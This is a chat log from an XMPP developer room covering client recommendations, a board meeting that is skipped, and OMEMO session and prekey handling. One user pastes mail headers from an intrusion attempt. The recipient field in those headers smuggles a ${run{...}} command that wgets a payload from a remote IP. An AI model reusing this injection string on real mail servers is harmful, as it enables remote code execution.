related HN thread https://news.ycombinator.com/item?id=20291889#20292122
edhelas
if you guys wants to reply
rtq3has left
Yagiza
Daniel, are you here?
adityaborikarhas left
Daniel
Yagiza: it's probably better if you just ask your question since there are other people in here who can answer them as well
Daniel
As lovetox demonstrated yesterday
Yagiza
Daniel, ok
Yagiza
So, once session_cipher is created, I don't need session_builder anymore?
Nekithas left
adityaborikarhas joined
Nekithas joined
adityaborikarhas left
adityaborikarhas joined
alacerhas left
alacerhas joined
mimi89999has left
adityaborikarhas left
alacerhas left
alacerhas joined
mimi89999has joined
adityaborikarhas joined
igoosehas left
rtq3has joined
rtq3has left
rtq3has joined
debaclehas joined
adityaborikarhas left
rtq3has left
rtq3has joined
rtq3has left
adityaborikarhas joined
rtq3has joined
pdurbinhas joined
adityaborikarhas left
Andrew Nenakhovhas left
Andrew Nenakhovhas joined
pdurbinhas left
rtq3has left
rion
Is it possible to add Psi here https://xmpp.org/getting-started/ ?
rion
ah there is a list on another page. ok.
Zash
https://xmpp.org/software/clients.html ?
rion
so the first list is discriminating all other clients :)
Zash
It would be nice if there were more detailed getting-started tutorials, with pictures and stuff. Maybe you could do one for Psi?
Zash
"get a client, get an account, done!" seems a bit bare
Zash
Let's not have another fight over this page š
jonasā
maybe clients should make tutorials superfluous by having proper onboarding
jonasā
with server lists and stuff
jonasā
and then we can make it a criterium for a client to have that type of flow to be listed on getting_started
jonasā
and Ge0rG can finally get rid of his pidgin
Zash
I don't see Pidgin there
jonasā
oh, so that was fixed already
Nekithas left
alacerhas left
rion
what's wrong with Pidgin?
jonasā
lack of support for any modern XMPP feature?
jonasā
and donāt get me started on plugins
Ge0rG
tl;dr: everything is wrong
jonasā
you know, pidgin, the type of client where you have to ask "did you write anything?" when the peer goes off- and online, because it doesnāt have stream management *or* MAM
jonasā
you know, pidgin, the type of client where you need to make other clients resource-lock to, otherwise you donāt get messages (no carbons)
jonasā
you know, pidgin, the type of client where you have to consciously log off before switching networks/suspending to not lose messages (again, no SM or MAM)
Nekithas joined
jonasā
you know, pidgin, the type of client which has an architecture which makes it easy for crypto plugins to accidentally send plaintext instead of ciphertext when you start a message with "/me"
jonasā
(Iām stopping now)
j.rhas left
pep.deserves its own rant anyway
pep.
fail.
jonasā
bahaha
pep.
Why poezio.. why..
pep.
"//me" doesn't even work
jonasā
it canāt
jonasā
and you know why :)
jonasā
thatās why you want to rant about it
jonasā
you need ///me
pep.
Yes
jonasā
and then everyone will see "//me" :)
j.rhas joined
pep.
jonasā, why I have you, can you merge this plz https://github.com/xsf/xmpp.org/pull/582 :)
rion
Well I always used Pidgin just like a transport for spectrum =)
pep.
I think there are also horror stories with that
j.rhas left
jonasā
pep., I donāt have github credentials at work
Nekithas left
jonasā
oh, spectrum with libpurple? you know, the IRC transport where you would get disconnected when you sent a message starting with ``/quit`` to the transport?
jonasā
or was it the transport where you would get disconnected when you sent a multi-line message like:
foo
QUIT :bar
jonasā
to get disconnected?
jonasā
I *am* in a ranty mood today.
rion
unfortunately Pidgin's Skype integration is full of bugs. That's what I needed at most last time.
Nekithas joined
j.rhas joined
alacerhas joined
mimi89999has left
rtq3has joined
mimi89999has joined
winfriedhas left
winfriedhas joined
Nekithas left
Nekithas joined
jcbrandhas left
pdurbinhas joined
adityaborikarhas joined
frainzhas left
frainzhas joined
pdurbinhas left
Nekithas left
neshtaxmpp
moparisbest: someone comment 127.0.0.1 or number ip is not importamr and this is LIE. today mi friend comment someone connect from 127.0.0.1 and send this:
Return-Path: <root@1ur.com>
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.com
Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.com
Received: from localhost (localhost [127.0.0.1]) by yourdomain.com (Postfix) with ESMTP id A94DBA00B30 for <root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.con>; Wed, 26 Jun 2019 02:58:45 +0200 (CEST)
X-Quarantine-ID: <UdVj8nzxJJRS>
X-Virus-Scanned: Debian amavisd-new at yourdomain.com
X-Amavis-Alert: BAD HEADER SECTION, Missing required header field: "Date"
Message-Id: <20190626005845.A94DBA00B30@yourdomain.com>
Date: Wed, 26 Jun 2019 02:58:45 +0200 (CEST)
From: root@1ur.com
adityaborikarhas left
pdurbinhas joined
adityaborikarhas joined
jonasā
neshtaxmpp, this room is not about email.
Nekithas joined
neshtaxmpp
jonasā: it is about sslh and someone try hack my friend server throught sslh. i need someone commment how sslh sopve apache2 to show real ip and block 127.0.0.1 not to be used outside internet.
jonasā
this room also is not about sslh
jonasā
or sysadmin in general
jcbrandhas joined
alacerhas left
alacerhas joined
vanitasvitae
neshtaxmpp, tell your fried to visit a local hackerspace to get help, but please do not bother the people in this room about it.
pep.
vanitasvitae, I wish hackerspaces were as big a thing anywhere else than they are in germany, but it's not the case :(
DebXWoodyhas left
DebXWoodyhas joined
Daniel
I'm not entirely sure hackerspaces want to be a replacement for search engines
Zash
Maybe there's even a support venue for sslh itself.
rtq3has left
rtq3has joined
lskdjfhas left
lskdjfhas joined
matlaghas left
pdurbinhas left
j.rhas left
peterhas joined
peterhas left
matlaghas joined
j.rhas joined
rtq3has left
doshas joined
rtq3has joined
intosihas left
Seveis on its way to the airport. Crossing fingers for a stable connection
Guus
Ralph and Matt can't make it.
Guus
if you're not on a reliable connection, we might as well skip the meeting, unless something important needs to be handled.
Guus
(assuming that nyco is here, in the first place)
Seve
Right
nyco
good guess
Guus
do we skip this meeting or not?
nyco
let me check the board
nyco
followup on badges is ok, I've not done the poll yet
nyco
so yes, I think we need more members to really advance
Seve
I guessed that, yes
Guus
ok, let's skip this meeting then.
nyco
three is good from a bylaws standpoint, but imho not enough for debate and decision making
Guus
agreed
nyco
ok
nyco
so, bang, and bang, done, thx all, +1W ;-)
Guus
have a good flight, Seve š
nyco
I believe I can flyyyyy
Seve
š
Guus
If your pilot sings that: run.
Nekithas left
Nekithas joined
Seve
Oh... Haha
Seve
If I hear that, it may be too late
j.rhas left
lumihas joined
peterhas joined
Ge0rG
Aw, what a pity. I wanted to provide an update regarding the German government contact.
Guus
Ge0rG - could you do that by mail, if it's longer than 2 sentences?
Guus
Do you need our input to progress?
Ge0rG
Guus: yes I can. No input needed so far. Should I write to members@?
peterhas left
rtq3has left
rtq3has joined
Guus
if it's of interest to the members, yes. Otherwise: did we solve that Board mailing thingy?
Guus
(Seve?)
Yagiza
Well...
adityaborikarhas left
Yagiza
Where can I get session_cipher to decrypt pre_key_signal_message?
j.rhas joined
Ge0rG
Guus: IIRC somebody is now looking for external mail to board@ or somesuch
jonasā
Ge0rG, Seve typically does that
Guus
(Who's now in a plane)
Guus
Ge0rG if you're unsure if it's suitable for members@, mail it to me, and I'll forward it to board@
Ge0rG
Guus: I'll try to write down something when I have a bit of time. Don't think there are any issues with using members@
Guus
tx
adityaborikarhas joined
Nekithas left
intosihas joined
adityaborikarhas left
Nekithas joined
APachhas left
APachhas joined
pdurbinhas joined
adityaborikarhas joined
neshtaxmpphas left
neshtaxmpphas joined
rtq3has left
rtq3has joined
pdurbinhas left
edhelashas left
edhelashas joined
igoosehas joined
Douglas Terabytehas left
adityaborikarhas left
peterhas joined
Douglas Terabytehas joined
adityaborikarhas joined
peterhas left
COM8has joined
COM8has left
davidhas left
davidhas joined
murabitohas left
murabitohas joined
goffihas left
j.rhas left
sezuanhas left
j.rhas joined
j.rhas left
Lancehas joined
andyhas left
j.rhas joined
andyhas joined
eevvoorhas joined
goffihas joined
adityaborikarhas left
matlaghas left
lovetoxhas joined
adityaborikarhas joined
neshtaxmpphas left
lovetox
Yagiza, yes session is only once build, after that you load the session from the database and use it to decrypt and encrypt
Nekithas left
Nekithas joined
matlaghas joined
Yagiza
lovetox, so, I have different question.
Wojtekhas joined
Yagiza
lovetox, how to generate session_cipher to decrypt pre_key_signal_message?
kokonoehas left
Yagiza
Do I have to decrypt it with a key, generated with empty session_builder (before session_builder_process_pre_key_bundle()) call?
lovetox
hm i cant talk much about the C lib but in the python port
lovetox
you create a new session_cipher
lovetox
then use ession_cipher.decryptPkmsg(pre_key_message)
lovetox
and the decryptPkmsg, does create a new session on its own and saves it to the database
lovetox
so nothing more to do here
lovetox
is there something similar in the C version?
kokonoehas joined
adityaborikarhas left
pdurbinhas joined
lovetox
there session_cipher_decrypt_pre_key_signal_message
lovetox
looked it up
lovetox
it does everything for you
lovetox
create a new session, store it to the db, decrypt the message
jcbrandhas left
Yagiza
lovetox, so, after that call, current session is invalidated and new session is created instead?
lovetox
yes
lovetox
thats also how you refresh a session, you just send a new pkmg
pdurbinhas left
lovetox
but normally this should not be necessery
Yagiza
lovetox, do I need to generate new session_cipher after that?
lovetox
session_cipher is only a wrapper
lovetox
it does not hold any state itself
lovetox
you call decrypt or encrypt on it, what it does is it loads the session from the database everytime
lovetox
you can also recreate it after each message if you want
Yagiza
lovetox, so, once session is changed, existing session_cipher will use a new session data?
lovetox
yes
edhelashas left
lovetox
i create it on the first message for each contact
lovetox
and cache it
edhelashas joined
lovetox
but you dont have to, you can also create it on every message new, does not make a difference
Yagiza
lovetox, IC
lovetox
session is loaded on each message, modified and stored back to database
lovetox
otherwise it would be highly likely that you have invalid session if your application crashes
lovetox
so no state is hold in memory
Nekithas left
Yagiza
lovetox, ok
Yagiza
lovetox, so, I need session_builder only when initiating session. If session initiated by other party, it is created by session_cipher_decrypt_pre_key_signal_message(), right?
lovetox
yes
Nekithas joined
waqashas joined
adityaborikarhas joined
alacerhas left
adityaborikarhas left
doshas left
doshas joined
Yagiza
lovetox, IC. Thank you.
Yagiza
lovetox, and the last question.
Yagiza
lovetox, how do I decide, to which resources of my contact do I need to send encrypted messages, and to which of them not encrypted? Only by checking if it has 'eu.siacs.conversations.axolotl.devicelist+notify' #disco feature?
Lancehas left
lovetox
no
lovetox
you dont send messages to resources
adityaborikarhas joined
lumihas left
lovetox
or better said all messages you send will arrive at all resources of the contact
lovetox
because of carbons, mam etc
Yagiza
lovetox, I can't be sure that all of resources of my contact do support OMEMO.
lovetox
you dont change anything about how you send a message
lovetox
Yagiza, you can be sure that one device supports it
lovetox
and thats enough
lovetox
the user decides if he wants to send encrypted or not
lovetox
not the client
Yagiza
lovetox, what do you mean? I have a contact. And I se all of their resources. And I can choose to which of them to send message.
Yagiza
lovetox, at least, my cliend allows that.
lovetox
so your client makes the server not save the message in MAM
lovetox
?
lovetox
otherwise you cant control who downloads a message from the archive
Yagiza
lovetox, my client to not support MAM yet.
Lancehas joined
lovetox
but the server has
Yagiza
lovetox, so?
lovetox
and the server stores all messages in MAM
lovetox
if you want or not
Yagiza
lovetox, ok
lovetox
and other clients will download it
lovetox
dont assume you can control who gets the message
lovetox
other than the barejid
lovetox
you find keys in pep
lovetox
then you know at least one device of the contact supports it
lovetox
and afterwards you give your user the decision if he wants to talk encrypted or not
peterhas joined
Yagiza
lovetox, anyway. When I send encrypted message, clients, which do not support OMEMO will just ignore it. When I send unencrypted message, all the clients may read and display it.
lovetox
yes
Yagiza
And I can't be sure, that my or their server do support MAM.
lovetox
and you cant know if the user is fine with that
lovetox
the user maybe totally fine with one of his devices ignoring omemo
lovetox
and only one device beeing able to decrypt
Yagiza
Yes
jcbrandhas joined
matlaghas left
lovetox
i just try to save you implementation trouble, you can try to make logic that start and stops encrypting if this and that happens
lovetox
but i tell you from experience users will come and tell you they want to make the decision themself
rtq3has left
peterhas left
lovetox
especially disco info is useless here
Yagiza
So, if user enabled OMEMO encryption for a contact, but selected a resource, which do not support it, I must somehow make him aware of the fact and send unencrypted messages in that case.
lovetox
it only works if a client is online
lovetox
omemo works also if the contact is offline
lovetox
dont forget that
Yagiza
lovetox, yes. That's not a problem.
lovetox
Yagiza, why do you even have UI where the user selects a resoure
Yagiza
lovetox, I'm telling only about the sace above.
Yagiza
lovetox, because that's a good tradition.
lovetox
if i talk as a user, i dont care how many devices are online of my friend, i just want to send him a message
Yagiza
lovetox, not all the servers do support MAM or Message Archving or Message Carbons.
lovetox
Yagiza, then we should tell the admins to upgrade
Yagiza
So, it's a good thing to have an ability to specify a resource.
lovetox
i cant help you with that, thats not a usecase for me to write clients for servers from the stoneage
Yagiza
lovetox, IC. So, you think sending messages to bare JID is a good idea?
lovetox
Yagiza, thats not what i wanted to say, allthough many devs in the community would answer that question with yes
lovetox
what i want to say is, that i think its bad UI if you make the user force a resource
rtq3has joined
lovetox
because user has to know about what a resource is, that is xmpp protocol stuff
lovetox
users just want to write messages
lovetox
and you should no assume only because you adress a message to a resource, that only this resource will get the message
eevvoorhas left
Yagiza
lovetox, yes, of course.
lovetox
that is 99% wrong assumption in our current world
Steve Killehas left
sezuanhas joined
sezuanhas left
sezuanhas joined
jonasā
send to the bare JID
jonasā
youāll be in pain when IM-NG lands otherwise :)
Steve Killehas joined
pep.
When is that :/
pep.
Any client/server already doing things with it? More than what MattJ said at the summit
jonasā
I think there was some discussion about that type of stuff the other day
jonasā
but donāt pin me down on tha
jonasā
I wish I had time to experiment with things, but so many fires to fight these weeks
and I thought we had bad luck with the 38°C yesterday
jonasā
(dropped to 25°C today)
lumihas joined
igoosehas left
igoosehas joined
rtq3has joined
matlaghas joined
igoosehas left
goffihas left
igoosehas joined
Yagizahas left
Yagizahas joined
alacerhas joined
pdurbinhas joined
alacerhas left
alacerhas joined
pdurbinhas left
lovetox
i dont find the xep that defines dataforms for disco info
lovetox
ah 128
jcbrandhas left
goffihas joined
rtq3has left
Yagiza
And one more question...
rtq3has joined
Yagiza
After I processed PreKeySignalMessage, an appropriate pre key is automatically substituted with a new one? So, I only need to refresh the bundle on the PEP server?
igoosehas left
lovetox
no
lovetox
the prekey which was used, is deleted from the database
lovetox
but no new keys are generated
lovetox
you have to do this yourself
lovetox
and of course you should instantly delete the prekey used from pep
igoosehas joined
Yagiza
lovetox, so, I need generate a new key instead of used one? Ok.
lovetox
you dont have to generate new ones, i mean we publish 100 keys
lovetox
you can also generate new ones when you reach 90 or something like this
lovetox
but you have to delete the used one from pep, so you have to push 99 keys anyway
lovetox
so i would say just generate one and push 100 again
Yagiza
lovetox, I aware about publishing new bundle of 100 keys.
Yagiza
lovetox, the only question was about generating a new key instead of used one.
lovetox
im not following, if a key is used, you only have 99, if you aware that you should have 100 keys
lovetox
what is there for other option than generate 1 new key?
alacerhas left
alacerhas joined
adityaborikarhas left
neshtaxmpphas joined
Yagiza
lovetox, I didn't know old key is deleted and a new one is generated automatically, or not. So, once you told me that it is deleted, but no new key is generated, I understand, that I only need to generate a new key to replace used one.
lovetox
ah ok :)
adityaborikarhas joined
lovetox
and Yagiza we should move the discussion to xmpp:jdev@conference.jabber.org?join this room is more suited
Yagiza
lovetox, yes. I tried to ask there, but almost no one replied.
lovetox
im always joined there :)
Yagiza
lovetox, me too.
adityaborikarhas left
vanitasvitae
Yagiza: you could take a look at https://blog.jabberhead.tk/2019/04/15/closer-look-at-the-double-ratchet/ to understand the inner workings of the signal protocol.
Nekithas left
Yagiza
vanitasvitae, ok, thank you!
adityaborikarhas joined
rtq3has left
rtq3has joined
j.rhas left
goffihas left
sezuanhas left
debaclehas left
j.rhas joined
Yagizahas left
krauqhas left
pdurbinhas joined
krauqhas joined
j.rhas left
j.rhas joined
vanitasvitaehas left
pdurbinhas left
jcbrandhas joined
vanitasvitaehas joined
peterhas joined
waqashas left
sezuanhas joined
Nekithas joined
j.rhas left
mimi89999has left
mimi89999has joined
jcbrandhas left
j.rhas joined
j.rhas left
debaclehas joined
sezuanhas left
sezuanhas joined
peterhas left
Nekithas left
sezuanhas left
edhelashas left
edhelashas joined
eevvoorhas joined
j.rhas joined
Zashhas left
wurstsalathas left
eevvoorhas left
karoshihas left
lovetox
can someone verify that the example here is wrong https://xmpp.org/extensions/xep-0128.html#examples
lovetox
as it has a field without type which means text-single
lovetox
but still has multiple <values>
lovetox
which is a MUST NOT in 0004
lovetox
or am i missing something
moparisthebest
jonasā, vanitasvitae: I've tried more than once to help neshtaxmpp by linking him to exactly what he was asking for etc, he's either a troll or beyond help, I just ignore now
pdurbinhas joined
pep.
moparisthebest, yeah I have also given in this domain :)